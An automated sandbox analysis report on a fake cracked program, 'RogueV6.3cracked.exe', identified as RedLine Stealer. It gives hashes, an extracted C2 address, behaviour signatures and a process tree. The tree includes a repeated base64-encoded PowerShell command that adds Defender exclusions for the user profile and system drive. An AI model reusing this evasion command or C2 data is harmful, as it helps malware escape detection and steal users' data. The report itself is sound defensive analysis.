Analysis
-
max time kernel
23s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2024 18:26
Static task
static1
Behavioral task
behavioral1
Sample
RogueV6.3cracked.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
RogueV6.3cracked.exe
Resource
win10v2004-20241007-en
General
-
Target
RogueV6.3cracked.exe
-
Size
13.6MB
-
MD5
ed475b5614b57bb769d9475bab408bb2
-
SHA1
a4496180da8930ea4b50f6b7e08e48cf4d093a43
-
SHA256
d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b
-
SHA512
88842132f2a486a34b4766d4b0092856fc3313895612f8aa613914acb5d32114ee033744c473b9ab28ec5f9f3e6e31980c85139f9f7dafdc4614b67f496403ce
-
SSDEEP
196608:/Qx1aFKgrjL4HwYJTPV+abRdGHMICWi0fNkn6zTetKvIy5nQmy:/Y1EDjL4QYJTQabRdGHvCWi0l6O+Kw
Malware Config
Extracted
redline
NOu
135.236.153.9:1912
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023b5a-4.dat family_redline behavioral2/memory/3264-11-0x0000000000270000-0x00000000002C2000-memory.dmp family_redline -
Redline family
-
Checks computer location settings 2 TTPs 24 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation RogueV6.3cracked.exe -
Executes dropped EXE 24 IoCs
pid Process 3264 build (4).exe 2628 build (4).exe 2936 build (4).exe 4288 build (4).exe 1588 build (4).exe 64 build (4).exe 2720 build (4).exe 5108 build (4).exe 1124 build (4).exe 2932 build (4).exe 4564 build (4).exe 2624 build (4).exe 1844 build (4).exe 3352 build (4).exe 1568 build (4).exe 2552 build (4).exe 5312 build (4).exe 5504 build (4).exe 5820 build (4).exe 6044 build (4).exe 5608 build (4).exe 6012 build (4).exe 6056 build (4).exe 1388 build (4).exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3056 8224 WerFault.exe 528 8244 3192 WerFault.exe 544 4692 4148 WerFault.exe 589 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2664 powershell.exe 348 powershell.exe 2468 powershell.exe 2664 powershell.exe 348 powershell.exe 2784 powershell.exe 2468 powershell.exe 2468 powershell.exe 1888 powershell.exe 1888 powershell.exe 4920 powershell.exe 4920 powershell.exe 2784 powershell.exe 2784 powershell.exe 3952 powershell.exe 3952 powershell.exe 3736 powershell.exe 3736 powershell.exe 1888 powershell.exe 4920 powershell.exe 5088 powershell.exe 5088 powershell.exe 3952 powershell.exe 3736 powershell.exe 4720 powershell.exe 4720 powershell.exe 4444 powershell.exe 4444 powershell.exe 5088 powershell.exe 560 powershell.exe 560 powershell.exe 2752 powershell.exe 2752 powershell.exe 4128 powershell.exe 4128 powershell.exe 4720 powershell.exe 4720 powershell.exe 4444 powershell.exe 4444 powershell.exe 3524 powershell.exe 3524 powershell.exe 560 powershell.exe 560 powershell.exe 2752 powershell.exe 4540 powershell.exe 4540 powershell.exe 4128 powershell.exe 5304 powershell.exe 5304 powershell.exe 3524 powershell.exe 3524 powershell.exe 5496 powershell.exe 5496 powershell.exe 5784 powershell.exe 5784 powershell.exe 4540 powershell.exe 4540 powershell.exe 6000 powershell.exe 6000 powershell.exe 5304 powershell.exe 5304 powershell.exe 5392 powershell.exe 5392 powershell.exe 5496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 348 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 3952 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 3524 powershell.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 5304 powershell.exe Token: SeDebugPrivilege 5496 powershell.exe Token: SeDebugPrivilege 5784 powershell.exe Token: SeDebugPrivilege 6000 powershell.exe Token: SeDebugPrivilege 5392 powershell.exe Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1956 wrote to memory of 2664 1956 RogueV6.3cracked.exe 83 PID 1956 wrote to memory of 2664 1956 RogueV6.3cracked.exe 83 PID 1956 wrote to memory of 2664 1956 RogueV6.3cracked.exe 83 PID 1956 wrote to memory of 3264 1956 RogueV6.3cracked.exe 85 PID 1956 wrote to memory of 3264 1956 RogueV6.3cracked.exe 85 PID 1956 wrote to memory of 3264 1956 RogueV6.3cracked.exe 85 PID 1956 wrote to memory of 3632 1956 RogueV6.3cracked.exe 86 PID 1956 wrote to memory of 3632 1956 RogueV6.3cracked.exe 86 PID 1956 wrote to memory of 3632 1956 RogueV6.3cracked.exe 86 PID 3632 wrote to memory of 348 3632 RogueV6.3cracked.exe 87 PID 3632 wrote to memory of 348 3632 RogueV6.3cracked.exe 87 PID 3632 wrote to memory of 348 3632 RogueV6.3cracked.exe 87 PID 3632 wrote to memory of 2628 3632 RogueV6.3cracked.exe 89 PID 3632 wrote to memory of 2628 3632 RogueV6.3cracked.exe 89 PID 3632 wrote to memory of 2628 3632 RogueV6.3cracked.exe 89 PID 3632 wrote to memory of 3628 3632 RogueV6.3cracked.exe 90 PID 3632 wrote to memory of 3628 3632 RogueV6.3cracked.exe 90 PID 3632 wrote to memory of 3628 3632 RogueV6.3cracked.exe 90 PID 3628 wrote to memory of 2468 3628 RogueV6.3cracked.exe 91 PID 3628 wrote to memory of 2468 3628 RogueV6.3cracked.exe 91 PID 3628 wrote to memory of 2468 3628 RogueV6.3cracked.exe 91 PID 3628 wrote to memory of 2936 3628 RogueV6.3cracked.exe 93 PID 3628 wrote to memory of 2936 3628 RogueV6.3cracked.exe 93 PID 3628 wrote to memory of 2936 3628 RogueV6.3cracked.exe 93 PID 3628 wrote to memory of 4516 3628 RogueV6.3cracked.exe 94 PID 3628 wrote to memory of 4516 3628 RogueV6.3cracked.exe 94 PID 3628 wrote to memory of 4516 3628 RogueV6.3cracked.exe 94 PID 4516 wrote to memory of 2784 4516 RogueV6.3cracked.exe 95 PID 4516 wrote to memory of 2784 4516 RogueV6.3cracked.exe 95 PID 4516 wrote to memory of 2784 4516 RogueV6.3cracked.exe 95 PID 4516 wrote to memory of 4288 4516 RogueV6.3cracked.exe 96 PID 4516 wrote to memory of 4288 4516 RogueV6.3cracked.exe 96 PID 4516 wrote to memory of 4288 4516 RogueV6.3cracked.exe 96 PID 4516 wrote to memory of 2064 4516 RogueV6.3cracked.exe 97 PID 4516 wrote to memory of 2064 4516 RogueV6.3cracked.exe 97 PID 4516 wrote to memory of 2064 4516 RogueV6.3cracked.exe 97 PID 2064 wrote to memory of 1888 2064 RogueV6.3cracked.exe 99 PID 2064 wrote to memory of 1888 2064 RogueV6.3cracked.exe 99 PID 2064 wrote to memory of 1888 2064 RogueV6.3cracked.exe 99 PID 2064 wrote to memory of 1588 2064 RogueV6.3cracked.exe 100 PID 2064 wrote to memory of 1588 2064 RogueV6.3cracked.exe 100 PID 2064 wrote to memory of 1588 2064 RogueV6.3cracked.exe 100 PID 2064 wrote to memory of 4776 2064 RogueV6.3cracked.exe 404 PID 2064 wrote to memory of 4776 2064 RogueV6.3cracked.exe 404 PID 2064 wrote to memory of 4776 2064 RogueV6.3cracked.exe 404 PID 4776 wrote to memory of 4920 4776 RogueV6.3cracked.exe 103 PID 4776 wrote to memory of 4920 4776 RogueV6.3cracked.exe 103 PID 4776 wrote to memory of 4920 4776 RogueV6.3cracked.exe 103 PID 4776 wrote to memory of 64 4776 RogueV6.3cracked.exe 104 PID 4776 wrote to memory of 64 4776 RogueV6.3cracked.exe 104 PID 4776 wrote to memory of 64 4776 RogueV6.3cracked.exe 104 PID 4776 wrote to memory of 1500 4776 RogueV6.3cracked.exe 106 PID 4776 wrote to memory of 1500 4776 RogueV6.3cracked.exe 106 PID 4776 wrote to memory of 1500 4776 RogueV6.3cracked.exe 106 PID 1500 wrote to memory of 3952 1500 RogueV6.3cracked.exe 107 PID 1500 wrote to memory of 3952 1500 RogueV6.3cracked.exe 107 PID 1500 wrote to memory of 3952 1500 RogueV6.3cracked.exe 107 PID 1500 wrote to memory of 2720 1500 RogueV6.3cracked.exe 109 PID 1500 wrote to memory of 2720 1500 RogueV6.3cracked.exe 109 PID 1500 wrote to memory of 2720 1500 RogueV6.3cracked.exe 109 PID 1500 wrote to memory of 4196 1500 RogueV6.3cracked.exe 110 PID 1500 wrote to memory of 4196 1500 RogueV6.3cracked.exe 110 PID 1500 wrote to memory of 4196 1500 RogueV6.3cracked.exe 110 PID 4196 wrote to memory of 3736 4196 RogueV6.3cracked.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3264
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:64
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"9⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1968 -
